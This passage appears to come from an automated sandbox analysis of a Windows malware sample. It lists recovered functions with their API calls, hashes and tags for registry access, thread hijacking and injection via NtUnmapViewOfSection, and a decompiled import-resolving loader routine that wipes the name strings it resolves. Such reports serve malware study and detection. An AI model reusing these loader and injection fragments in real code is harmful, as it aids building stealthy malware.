  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
